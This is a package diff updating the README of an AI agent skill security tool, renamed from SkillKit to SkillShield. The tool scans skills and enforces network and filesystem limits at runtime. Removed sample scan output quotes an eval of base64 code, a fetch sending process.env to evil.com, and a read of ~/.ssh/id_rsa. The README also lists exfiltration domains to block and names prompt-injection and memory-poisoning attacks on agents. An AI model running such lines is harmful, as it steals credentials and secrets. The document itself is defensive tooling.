skillshield 1.0.0 → 2.1.0

package/README.md

@@ -1,86 +1,71 @@
 <div align="center">
 
 ```
-  ███████╗██╗  ██╗██╗██╗     ██╗  ██╗██╗████████╗
-  ██╔════╝██║ ██╔╝██║██║     ██║ ██╔╝██║╚══██╔══╝
-  ███████╗█████╔╝ ██║██║     █████╔╝ ██║   ██║
-  ╚════██║██╔═██╗ ██║██║     ██╔═██╗ ██║   ██║
-  ███████║██║  ██╗██║███████╗██║  ██╗██║   ██║
-  ╚══════╝╚═╝  ╚═╝╚═╝╚══════╝╚═╝  ╚═╝╚═╝   ╚═╝
+  ███████╗██╗  ██╗██╗██╗     ██╗     ███████╗██╗  ██╗██╗███████╗██╗     ██████╗
+  ██╔════╝██║ ██╔╝██║██║     ██║     ██╔════╝██║  ██║██║██╔════╝██║     ██╔══██╗
+  ███████╗█████╔╝ ██║██║     ██║     ███████╗███████║██║█████╗  ██║     ██║  ██║
+  ╚════██║██╔═██╗ ██║██║     ██║     ╚════██║██╔══██║██║██╔══╝  ██║     ██║  ██║
+  ███████║██║  ██╗██║███████╗███████╗███████║██║  ██║██║███████╗███████╗██████╔╝
+  ╚══════╝╚═╝  ╚═╝╚═╝╚══════╝╚══════╝╚══════╝╚═╝  ╚═╝╚═╝╚══════╝╚══════╝╚═════╝
 ```
 
-**Snyk for AI Agent Skills — Scan, Test & Run Securely.**
+**Runtime Security for AI Agent Skills — Scan, Sandbox & Enforce.**
 
-The open-source security scanner and runtime for SKILL.md files. Detect malicious patterns, prompt injection, memory poisoning, credential theft, and supply chain attacks before they execute.
+The first open-source tool that **scans AND stops** malicious AI skills at runtime. Network interception, filesystem jail, kill switch, and cryptographic audit trail — in one developer-first CLI.
 
 [![MIT License](https://img.shields.io/badge/license-MIT-blue.svg)](LICENSE)
-[![npm version](https://img.shields.io/npm/v/skillkit.svg)](https://www.npmjs.com/package/skillkit)
+[![npm version](https://img.shields.io/npm/v/skillshield.svg)](https://www.npmjs.com/package/skillshield)
 [![Node.js](https://img.shields.io/badge/node-%3E%3D18-brightgreen.svg)](https://nodejs.org)
 [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](CONTRIBUTING.md)
 
-[English](#english) | [Espanol](#espanol) | [中文](#中文) | [Portugues](#portugues)
-
 </div>
 
 ---
 
-<a name="english"></a>
+## The Problem
 
-## What is SkillKit?
+> "The industry has invested in watching. It hasn't invested in stopping." — Bessemer Venture Partners
 
-SkillKit is an open-source security scanner and runtime for **SKILL.md** files — the standard format used by ClawHub's 13,700+ skills, Claude Code, OpenAI Codex, and VS Code Copilot. It scans for **72+ threat patterns** across **14 categories** including memory poisoning, prompt injection, and supply chain attacks — then executes safely in a sandboxed environment with **any AI model**.
+Every existing tool for AI skill security does the same thing: **scan before install, then hope for the best.** Snyk agent-scan, Cisco skill-scanner, VirusTotal — they all stop at detection. Once a skill passes their checks (or bypasses them), there's zero protection at runtime.
 
-```bash
-# Install and scan in 10 seconds
-npm install -g skillkit
-skillkit scan suspicious-skill.md
-skillkit run safe-skill.md --provider groq
-```
+Meanwhile: 36% of ClawHub skills have security flaws. 12% are actual malware. And the most dangerous attacks — sleeper agents, time-delayed exfiltration, polymorphic payloads — are invisible to pre-install scanners.
 
-### Why SkillKit?
+## The Solution: SkillShield
 
-- **VirusTotal** only detects 57.7% of threats in OpenClaw skills
-- **36% of ClawHub skills** have security flaws (Snyk research)
-- **12% are actual malware** (ClawHavoc campaign)
-- **SkillKit detects what others miss**: memory poisoning, sleeper agents, API key leaks, supply chain attacks
+SkillShield is the first tool that combines **pre-execution scanning** with **runtime enforcement** in a single CLI. It doesn't just detect threats — it **prevents them from executing**.
 
-### Security Comparison
+```bash
+npm install -g skillshield
 
-| Feature | VirusTotal | Bitdefender | ClawSecure | **SkillKit** |
-|---------|-----------|-------------|------------|------------|
-| Open Source | No | No | No | **Yes (MIT)** |
-| Free CLI | No | Yes (limited) | No | **Yes** |
-| Detection Rate | 57.7% | ~60% | ~85% | **72+ patterns** |
-| Prompt Injection | Basic | No | Yes | **Yes (6 patterns)** |
-| Memory Poisoning | No | No | Partial | **Yes (7 patterns)** |
-| Supply Chain | No | No | No | **Yes (6 patterns)** |
-| API Key Detection | No | No | No | **Yes (10 formats)** |
-| Sandbox Execution | No | No | No | **Yes (Process + Docker)** |
-| CI/CD Integration | No | No | Paid | **Free GitHub Action** |
+# Scan a skill (72+ patterns, 14 threat categories)
+skillshield scan suspicious-skill.md
 
-### Quick Start
+# Scan + Shield + Execute (the full pipeline)
+skillshield run my-skill.md --input "Hello world"
 
-```bash
-# 1. Install globally
-npm install -g skillkit
-
-# 2. Scan a skill for threats BEFORE running it
-skillkit scan my-skill.skill.md
-# => Safety Score: 95/100 | APPROVED | 0 threats found
-
-# 3. Run safely with any AI model
-skillkit run my-skill.skill.md --provider groq
-skillkit run my-skill.skill.md --provider openai --model gpt-4o
-
-# 4. Scan a suspicious skill
-skillkit scan evil-skill.skill.md
-# => Safety Score: 12/100 | BLOCKED
-# => CRITICAL: Memory poisoning detected (SOUL.md manipulation)
-# => CRITICAL: API key exfiltration (sk- pattern found)
-# => HIGH: Supply chain attack (curl | bash pattern)
+# Save cryptographic audit trail for compliance
+skillshield run my-skill.md --audit-file trail.json
+```
+
+## How It Works
+
+```
+┌──────────────────────────────────────────────────────────────┐
+│                    skillshield run                            │
+├──────────┬───────────────────┬──────────────┬────────────────┤
+│  PHASE 1 │     PHASE 2       │   PHASE 3    │    PHASE 4     │
+│  SCAN    │     SHIELD        │   EXECUTE    │    REPORT      │
+│          │                   │              │                │
+│ 72+      │ Network Policy    │ Enforcement  │ Shield Report  │
+│ patterns │ Filesystem Jail   │ wrapper      │ Audit chain    │
+│ 14 cats  │ Kill Switch       │ injected     │ Violations     │
+│          │ Audit Trail       │              │ Chain hash     │
+└──────────┴───────────────────┴──────────────┴────────────────┘
 ```
 
-### Threat Detection: 14 Categories, 72+ Patterns
+### Phase 1: Pre-Scan (SkillGuard)
+
+72+ regex patterns across 14 threat categories — including 3 categories nobody else detects:
 
 | Category | Patterns | What It Catches |
 |----------|---------|----------------|
@@ -99,292 +84,149 @@ skillkit scan evil-skill.skill.md
 | **Privilege Escalation** | 2 | sudo/su, SUID/SGID bits |
 | **Malware** | 4 | Reverse shells, fork bombs, encoded PowerShell, exploitation frameworks |
 
-### Security Badge
-
-Show the world your skills are verified. Generate a shields.io badge after scanning:
-
-```bash
-# Generate badge for your skill
-skillkit badge my-skill.skill.md
-# => [![SkillKit Verified](https://img.shields.io/badge/...)](https://github.com/artefactforge/skillkit)
-
-# Auto-append to your README
-skillkit badge my-skill.skill.md --output README.md
-
-# Choose badge style
-skillkit badge my-skill.skill.md --style flat-square
-```
-
-Badge levels:
+### Phase 2: Runtime Shield (The Differentiator)
 
-| Score | Badge | Status |
-|-------|-------|--------|
-| 90-100 (0 threats) | ![Verified](https://img.shields.io/badge/SkillKit_Verified-100%2F100_%C2%B7_SAFE-00C853?style=flat-square) | **SAFE** — Verified clean |
-| 80-89 | ![Approved](https://img.shields.io/badge/SkillKit_Scanned-85%2F100_%C2%B7_APPROVED-4CAF50?style=flat-square) | **APPROVED** — Minor observations |
-| 50-79 | ![Review](https://img.shields.io/badge/SkillKit_Review-62%2F100_%C2%B7_REVIEW_REQUIRED-FF9800?style=flat-square) | **REVIEW REQUIRED** — Needs attention |
-| 0-49 | ![Blocked](https://img.shields.io/badge/SkillKit_Blocked-12%2F100_%C2%B7_BLOCKED-F44336?style=flat-square) | **BLOCKED** — Do not execute |
+This is what makes SkillShield unique. Four enforcement layers activate **during** skill execution:
 
-### Architecture
+**Network Policy Engine** — Default-deny networking. Skills can only reach explicitly allowed domains. Blocks known malicious domains (ngrok.io, webhook.site, requestbin.com) and crypto mining pools. Intercepts `dns.lookup` and `https.request` at the Node.js level.
 
-```
-skillkit/
-├── src/
-│   ├── guard/          # SkillGuard — 72+ threat patterns, 14 categories
-│   ├── sandbox/        # Process + Docker sandbox with shell:false isolation
-│   ├── core/           # SKILL.md parser (Zod validated), runtime engine
-│   ├── router/         # Multi-model router — 11 providers, 39+ models
-│   ├── cli/            # CLI: scan, badge, run, init, search, install, list, deploy
-│   ├── hub/            # ClawHub client + local skill registry
-│   ├── channels/       # WhatsApp, Telegram, Discord, Slack adapters
-│   ├── tools/          # Tool system (search, extract, crawl)
-│   ├── i18n/           # EN, ES, ZH, PT translations
-│   └── utils/          # Logger, error handling
-├── .github/workflows/  # GitHub Action for automated scanning
-├── examples/           # 8 example skills
-└── tests/              # 36+ tests
+```bash
+# Only allow specific domains
+skillshield run my-skill.md --allow-domains api.openai.com,github.com
 ```
 
-### Supported Models
+**Filesystem Jail** — Skills cannot read or write sensitive paths. Protects `~/.ssh`, `~/.aws`, `.env`, `SOUL.md`, `MEMORY.md`, `IDENTITY.md`, private keys, and credentials. Monkey-patches `fs.readFileSync`, `fs.writeFileSync`, and `fs.unlinkSync`.
 
-| Provider | Models | Free Tier | API Key Required |
-|----------|--------|-----------|-----------------|
-| **Ollama** (local) | Llama 3, Qwen 2.5, DeepSeek R1, Mistral, Gemma | **Unlimited (local)** | No |
-| **DeepSeek** | deepseek-chat, deepseek-r1 | **500K tokens/day** | Yes (free) |
-| **Qwen** (Alibaba) | qwen-plus, qwen-turbo, qwen-max | **1M tokens/mo** | Yes (free) |
-| **Groq** | Llama 3.3, Mixtral | **14.4K req/day** | Yes (free) |
-| **Google** | Gemini 2.0 Flash, Gemini 2.5 Pro | **15 req/min** | Yes (free) |
-| **OpenAI** | GPT-4o, GPT-4o-mini, GPT-4 | Paid only | Yes |
-| **Anthropic** | Claude Opus 4, Claude Sonnet 4 | Paid only | Yes |
-| **Kimi** (Moonshot) | Moonshot v1 128k/32k/8k | Yes (limited) | Yes |
-| **Zhipu** (BigModel) | GLM-4, GLM-4 Flash, GLM-4 Plus | Yes (limited) | Yes |
-| **Together AI** | Llama, Mixtral, Code models | $25 free credit | Yes |
-| **Fireworks** | Fast inference models | $1 free credit | Yes |
+**Kill Switch** — Real-time monitoring of skill output. If the skill produces malicious patterns during execution (not just in source code), SkillShield kills the process immediately. Triggers on: timeout (60s default), memory limit (512MB), output flooding (10MB), critical threat patterns, or max violation count.
 
-### SkillGuard Security
-
-SkillKit includes **SkillGuard**, a security scanner that detects malicious patterns in SKILL.md files before execution:
+**Cryptographic Audit Trail** — Every action during execution (scan, network request, file access, kill switch activation) is recorded in a SHA-256 hash-chained log. Each entry links to the previous via hash, creating a tamper-evident chain. Export to JSON for compliance.
 
 ```bash
-$ skillkit scan suspicious-skill.md
-
-  SkillGuard Security Report
-  ─────────────────────────────────────
-  Safety Score: 23/100        BLOCKED
-
-  CRITICAL (2):
-  [C1] Code injection detected (line 42)
-       Evidence: eval(Buffer.from('...', 'base64').toString())
+# Save the full audit trail
+skillshield run my-skill.md --audit-file audit.json
 
-  [C2] Data exfiltration attempt (line 67)
-       Evidence: fetch('https://evil.com/collect', { body: process.env })
-
-  HIGH (1):
-  [H1] Credential theft pattern (line 15)
-       Evidence: readFileSync(path.join(homedir(), '.ssh/id_rsa'))
-
-  Recommendation: DO NOT execute this skill.
+# The audit trail is hash-chained (blockchain-style)
+# Tampering with any entry breaks the chain verification
 ```
 
-72+ detection patterns across 14 categories — including 3 categories nobody else detects: **memory poisoning** (SOUL.md/MEMORY.md attacks), **sensitive data** (API key format detection for OpenAI, Anthropic, AWS, Groq, GitHub), and **supply chain attacks** (pipe-to-shell, postinstall hooks, remote imports).
-
-### Creating Your Own Skill
+### Phase 4: Shield Report
 
-Skills are simple Markdown files with YAML frontmatter:
+After every execution, SkillShield prints a complete security report:
 
-```markdown
----
-name: my-awesome-skill
-description: Does something amazing
-version: 1.0.0
-author: YourName
-tags: [productivity, automation]
-model_requirements:
-  minSize: medium
-  capabilities: [streaming]
-inputs:
-  - name: task
-    type: string
-    description: What to do
-    required: true
-outputs:
-  - name: result
-    type: string
-    description: The output
----
-
-# My Awesome Skill
-
-You are a helpful assistant that [does something specific].
-
-## Instructions
-
-1. Take the user's input
-2. Process it in a specific way
-3. Return a structured result
-
-## Examples
-
-**Input:** "example input"
-**Output:** "example output"
 ```
+  ────────────────────────────────────────────────────
+  SHIELD REPORT
+  ────────────────────────────────────────────────────
+  Status: CLEAN EXECUTION
 
-### Contributing
-
-We welcome contributions in all languages! See [CONTRIBUTING.md](CONTRIBUTING.md) for guidelines.
+  Pre-Scan Score:  95/100 (APPROVED)
+  Network:         0 violations
+  Filesystem:      0 violations
+  Runtime Threats: 0 detected
+  Duration:        1247ms
 
-```bash
-git clone https://github.com/artefactforge/skillkit.git
-cd skillkit
-npm install
-npm run dev
+  Audit Chain:     6 entries
+  Latest Hash:     a3f8b2c1d4e5f6a7b8c9...
+  Chain Integrity: VERIFIED
+  ────────────────────────────────────────────────────
 ```
 
----
+## Why Not Just Use...
 
-<a name="espanol"></a>
+| Tool | What It Does | What It Doesn't Do |
+|------|-------------|-------------------|
+| **Snyk agent-scan** | LLM judges + regex, pre-install | No runtime enforcement. Scan-only. |
+| **Cisco skill-scanner** | YARA + AST + policy engine | No runtime enforcement. Pre-install only. |
+| **NVIDIA OpenShell** | Linux runtime sandboxing | Enterprise-only. Linux-only. No pre-scan. |
+| **Aegis** | LLM API call proxy | Only intercepts API calls, not filesystem/network. |
+| **rohitg00/skillkit** | 46 rules + skill translation | No runtime. No enforcement. No audit trail. |
+| **SkillShield** | **Scan + Network + Filesystem + Kill Switch + Audit** | **The full pipeline in one CLI. Cross-platform.** |
 
-## Que es SkillKit?
+## Security Badge
 
-SkillKit es un escaner de seguridad open-source para archivos **SKILL.md** — el formato estandar de ClawHub, Claude Code, y OpenAI Codex. Detecta **72+ patrones maliciosos** en **14 categorias** incluyendo envenenamiento de memoria, inyeccion de prompts, robo de credenciales, y ataques de cadena de suministro — luego ejecuta de forma segura con **cualquier modelo de IA**.
+Show the world your skills are verified:
 
 ```bash
-# Instalar y ejecutar en 10 segundos
-npx skillkit init
-skillkit run --skill email-assistant --model deepseek-r1
+skillshield badge my-skill.md                    # Generate badge
+skillshield badge my-skill.md --output README.md  # Auto-append to README
 ```
 
-### Por que SkillKit?
-
-| Caracteristica | OpenClaw | SkillKit |
-|----------------|----------|----------|
-| Modelos | Solo Claude | **11 proveedores** (Claude, GPT, DeepSeek, Qwen, Gemini, Ollama, Groq, Kimi, Zhipu, Together, Fireworks) |
-| Costo | $20/mes minimo | **$0** con modelos locales/gratis (DeepSeek, Ollama) |
-| Seguridad | 820+ skills maliciosos encontrados | **SkillGuard** escanea cada skill antes de ejecutarlo |
-| Idiomas | Solo ingles | **EN, ES, ZH, PT** desde el dia 1 |
-| Canales | Solo CLI | **CLI + WhatsApp + Telegram + Discord + Slack** |
-| Instalacion | Configuracion compleja | **Un solo comando**: `npx skillkit init` |
-
-### Inicio Rapido
-
-```bash
-# 1. Instalar
-npm install -g skillkit
-
-# 2. Configuracion interactiva (idioma, proveedor, API key)
-skillkit init
-
-# 3. Ejecutar un skill con tu modelo preferido
-skillkit run --skill email-assistant --model deepseek-chat --input "Seguimiento propuesta cliente"
-
-# 4. Escanear seguridad de un skill
-skillkit scan clawhub://solana-wallet-tracker
-# => BLOQUEADO: keylogger detectado (puntuacion: 12/100)
+| Score | Badge | Status |
+|-------|-------|--------|
+| 90-100 | ![Verified](https://img.shields.io/badge/SkillShield_Verified-100%2F100_%C2%B7_SAFE-00C853?style=flat-square) | **SAFE** |
+| 80-89 | ![Approved](https://img.shields.io/badge/SkillShield_Scanned-85%2F100_%C2%B7_APPROVED-4CAF50?style=flat-square) | **APPROVED** |
+| 50-79 | ![Review](https://img.shields.io/badge/SkillShield_Review-62%2F100_%C2%B7_REVIEW_REQUIRED-FF9800?style=flat-square) | **REVIEW REQUIRED** |
+| 0-49 | ![Blocked](https://img.shields.io/badge/SkillShield_Blocked-12%2F100_%C2%B7_BLOCKED-F44336?style=flat-square) | **BLOCKED** |
 
-# 5. Ejecutar con modelo local GRATIS
-skillkit run --skill data-analyst --model ollama/qwen2.5
+## Architecture
 
-# 6. Desplegar como bot de WhatsApp
-skillkit deploy --channel whatsapp --skill customer-support
 ```
-
-### Modelos Soportados
-
-| Proveedor | Modelos | Tier Gratis |
-|-----------|---------|-------------|
-| **Ollama** (local) | Llama 3, Qwen 2.5, DeepSeek R1 | **Ilimitado** |
-| **DeepSeek** | deepseek-chat, deepseek-r1 | **500K tokens/dia** |
-| **Qwen** (Alibaba) | qwen-plus, qwen-turbo | **1M tokens/mes** |
-| **Groq** | Llama 3.3, Mixtral | **14.4K req/dia** |
-| **Google** | Gemini 2.0 Flash | **15 req/min** |
-
-### Contribuir
-
-Aceptamos contribuciones en todos los idiomas. Consulta [CONTRIBUTING.md](CONTRIBUTING.md).
-
----
-
-<a name="中文"></a>
-
-## 什么是 SkillKit？
-
-SkillKit 是一个开源运行时，可以执行 **SKILL.md** 文件——ClawHub 上 10,700+ 技能使用的标准格式——支持**任何 AI 模型**（Claude、GPT、DeepSeek、通义千问、Ollama、Gemini 等），支持**任何语言**，并内置**安全扫描**功能。
-
-```bash
-# 10秒内安装并运行
-npx skillkit init
-skillkit run --skill email-assistant --model deepseek-r1
+skillshield/
+├── src/
+│   ├── guard/          # SkillGuard — 72+ threat patterns, 14 categories
+│   ├── shield/         # Runtime enforcement engine
+│   │   ├── network-policy.ts   # DNS interception + domain allowlist
+│   │   ├── filesystem-jail.ts  # Sensitive path protection + fs monkey-patch
+│   │   ├── runtime-monitor.ts  # Kill switch + real-time output scanning
+│   │   ├── audit-trail.ts      # SHA-256 hash-chained audit log
+│   │   └── index.ts            # SkillShield orchestrator
+│   ├── sandbox/        # Process + Docker sandbox with shell:false isolation
+│   ├── core/           # SKILL.md parser (Zod validated), runtime engine
+│   ├── router/         # Multi-model router — 11 providers, 39+ models
+│   ├── cli/            # CLI: scan, run, badge, init, search, install, deploy
+│   ├── hub/            # ClawHub client + local skill registry
+│   ├── channels/       # WhatsApp, Telegram, Discord, Slack adapters
+│   ├── tools/          # Tool system (search, extract, crawl)
+│   └── i18n/           # EN, ES, ZH, PT translations
+├── .github/workflows/  # GitHub Action for automated scanning
+├── examples/           # Example skills
+└── tests/              # Test suite
 ```
 
-### 为什么选择 SkillKit？
-
-| 特性 | OpenClaw | SkillKit |
-|------|----------|----------|
-| 模型支持 | 仅 Claude | **11 供应商**（Claude、GPT、DeepSeek、通义千问、Gemini、Ollama、Groq、Kimi、智谱 等） |
-| 成本 | 最低 $20/月 | 使用本地/免费模型 **$0**（DeepSeek、Ollama） |
-| 安全性 | 发现 820+ 恶意技能 | **SkillGuard** 在执行前扫描每个技能 |
-| 语言 | 仅英文 | 第一天起支持 **EN、ES、ZH、PT** |
-| 渠道 | 仅 CLI | **CLI + WhatsApp + Telegram + Discord + Slack** |
-| 安装 | 复杂配置 | **一条命令**：`npx skillkit init` |
-
-### 快速开始
+## CLI Reference
 
 ```bash
-# 1. 安装
-npm install -g skillkit
+# Scanning
+skillshield scan <skill.md>              # Full security audit
+skillshield scan <skill.md> --json       # JSON output for CI/CD
 
-# 2. 交互式设置（选择语言、供应商、API密钥）
-skillkit init
+# Runtime (Scan + Shield + Execute)
+skillshield run <skill> --input "..."    # Full pipeline
+skillshield run <skill> --no-shield      # Scan only, no enforcement
+skillshield run <skill> --no-scan        # Skip pre-scan (not recommended)
+skillshield run <skill> --timeout 30000  # Custom timeout (ms)
+skillshield run <skill> --max-memory 256 # Custom memory limit (MB)
+skillshield run <skill> --allow-domains api.openai.com,github.com
+skillshield run <skill> --audit-file trail.json
+skillshield run <skill> --verbose        # Show all shield activity
 
-# 3. 使用国产模型运行技能（免费）
-skillkit run --skill data-analyst --model deepseek-chat --input "分析我的销售数据"
+# Badge
+skillshield badge <skill.md>             # Generate shields.io badge
+skillshield badge <skill.md> --output README.md
 
-# 4. 使用本地模型（零成本）
-skillkit run --skill email-assistant --model ollama/qwen2.5
-
-# 5. 安全扫描
-skillkit scan clawhub://solana-wallet-tracker
-# => 已拦截：检测到键盘记录器（安全评分：12/100）
+# Skill management
+skillshield init                         # Interactive setup
+skillshield search "data analysis"       # Find skills
+skillshield install <name>               # Install from hub
+skillshield list                         # List installed
 ```
 
-### 支持的国产模型
-
-| 供应商 | 模型 | 免费额度 |
-|--------|------|---------|
-| **DeepSeek** | deepseek-chat, deepseek-r1 | 每日 50万 tokens |
-| **通义千问** (阿里云) | qwen-plus, qwen-turbo, qwen-max | 每月 100万 tokens |
-| **Ollama** (本地) | Qwen 2.5, DeepSeek R1, Llama 3 | 无限制（本地运行） |
+## Contributing
 
-### 贡献
+We welcome contributions! The most impactful areas right now:
 
-我们欢迎所有语言的贡献！请参阅 [CONTRIBUTING.md](CONTRIBUTING.md)。
-
----
-
-<a name="portugues"></a>
-
-## O que e SkillKit?
-
-SkillKit e um runtime open-source que executa arquivos **SKILL.md** — o formato padrao usado pelas 10.700+ skills do ClawHub — com **qualquer modelo de IA**, em **qualquer idioma**, com **varredura de seguranca integrada**.
+1. **New threat patterns** — Found a new attack vector? Add it to `src/guard/patterns.ts`
+2. **Shield bypass testing** — Try to break the runtime enforcement. If you succeed, file an issue.
+3. **CI/CD integrations** — GitHub Actions, GitLab CI, Jenkins plugins
+4. **Platform-specific enforcement** — Windows, macOS, Linux edge cases
 
 ```bash
-# Instalar e executar em 10 segundos
-npx skillkit init
-skillkit run --skill email-assistant --model deepseek-r1
-```
-
-### Inicio Rapido
-
-```bash
-npm install -g skillkit
-skillkit init
-skillkit run --skill email-assistant --model deepseek-chat --input "Acompanhamento da proposta do cliente"
-skillkit scan clawhub://solana-wallet-tracker
+git clone https://github.com/artefactforge/skillshield.git
+cd skillshield
+npm install
+npm run build
 ```
 
-### Contribuir
-
-Aceitamos contribuicoes em todos os idiomas! Consulte [CONTRIBUTING.md](CONTRIBUTING.md).
-
 ---
 
 <div align="center">
@@ -393,8 +235,8 @@ Aceitamos contribuicoes em todos os idiomas! Consulte [CONTRIBUTING.md](CONTRIBU
 
 MIT License - See [LICENSE](LICENSE) for details.
 
-Built with love by [ArtefactForge](https://artefactforge.ai)
+Built by [ArtefactForge](https://artefactforge.ai)
 
-**Star this repo** if SkillKit saves you time or money!
+**The industry invested in watching. We invested in stopping.**
 
 </div>

package/dist/cli/commands/run.d.ts

@@ -1,3 +1,15 @@
+/**
+ * SkillShield Run Command — The Full Runtime Security Pipeline
+ *
+ * Flow:
+ *   1. SCAN  — SkillGuard pre-execution pattern matching (72+ patterns, 14 categories)
+ *   2. SHIELD — Activate runtime enforcement (network policy, filesystem jail, kill switch)
+ *   3. EXECUTE — Run the skill with enforcement wrapper injected
+ *   4. REPORT — Show ShieldReport with violations, audit hash, resource usage
+ *
+ * This is the command that makes SkillShield unique in the market:
+ *   "The first tool that scans AND stops — in one CLI."
+ */
 import { Command } from 'commander';
 export declare function run(program: Command): void;
 //# sourceMappingURL=run.d.ts.map

package/dist/cli/commands/run.d.ts.map

@@ -1 +1 @@
-{"version":3,"file":"run.d.ts","sourceRoot":"","sources":["../../../src/cli/commands/run.ts"],"names":[],"mappings":"AAEA,OAAO,EAAE,OAAO,EAAE,MAAM,WAAW,CAAC;AAgBpC,wBAAgB,GAAG,CAAC,OAAO,EAAE,OAAO,QAmKnC"}
+{"version":3,"file":"run.d.ts","sourceRoot":"","sources":["../../../src/cli/commands/run.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;GAWG;AAIH,OAAO,EAAE,OAAO,EAAE,MAAM,WAAW,CAAC;AAiFpC,wBAAgB,GAAG,CAAC,OAAO,EAAE,OAAO,QAiRnC"}